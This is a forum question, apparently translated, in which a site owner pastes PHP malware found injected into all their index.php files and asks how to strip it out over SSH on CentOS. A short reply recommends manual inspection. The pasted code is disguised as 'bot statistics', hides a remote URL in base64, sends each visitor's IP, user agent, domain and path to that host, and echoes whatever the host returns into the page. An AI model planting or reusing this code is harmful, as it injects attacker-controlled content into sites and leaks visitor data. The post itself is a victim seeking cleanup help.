使用谷歌机器人的恶意软件工作[关闭]

this is a malware that lives on my sites, its very bad ,

<?php    
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&   (strstr($sUserAgent, 'bot') == false)) // Bot comes
{
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
$stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink ); 
}
} 
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle); 
if ($sResult[0]=="O") 
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle); 
}
?>

this is fixed on all index.php files on my server, now i want to clean all index.php pages with ssh or remote in centos, i think its possible with a simple php code and regular expresion(maybe) , i need to this script [sorry for my weak en lang]

thanks so much

Unless you are handling 200+ files, it would be much better for you to go through each file individually and clean out the malware. This is so that you can visually inspect each file.

(EDIT: That is, if it is actually malware.)